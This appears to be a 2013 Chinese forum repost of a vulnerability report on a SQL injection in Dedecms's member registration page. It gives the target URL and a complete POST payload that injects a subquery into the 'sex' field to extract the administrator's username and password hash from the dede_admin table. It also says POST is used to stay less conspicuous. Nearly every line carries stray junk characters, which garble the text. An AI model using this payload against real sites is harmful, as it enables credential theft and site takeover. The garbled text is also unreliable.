漏洞类型: SQL注射漏洞
1 b; b6 t) A1 H% _: Z简要描述:
! Z6 c% m% p( @- P. a; [0 n: B ' k8 S" i2 i: A. {- c1 o; b/ `' Y0 N
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
5 O' i2 ~3 K1 B4 H$ t原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) [" ^$ f+ B/ I
详细说明:跟这个漏洞
+ M2 f9 ^( a" v3 b: Z* L
! c/ r; X' [/ xWooYun: Dedecms SQL注射导致审核机制绕过漏洞' W- P( i6 q+ e6 z6 H1 k, B! L: n
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
* }* n3 j" H5 k. ]& H; TPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
# E/ x m: r5 t* C Z
1 U( g }# H- M( w. C/ W, B9 pwww.political-security.com/member/reg_new.php
6 v* [% J7 G+ d4 M( y 2 f; r( E0 Q8 M
POST
8 T3 d0 I& k, e; P; X j5 V+ D8 l( X- k& a8 U
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
1 o/ \2 X- f4 Vuserid=c4rp3nt3r&uname=c4rp3nt3r5 N" b8 [; F/ ?0 u& v) N5 N( \
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
( \% W3 Q8 |' p/ B' ~. d&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,( w3 N! c( K+ _2 l- q4 c
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');. J# @$ ?7 |7 K( f5 J! U$ J2 @* [
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对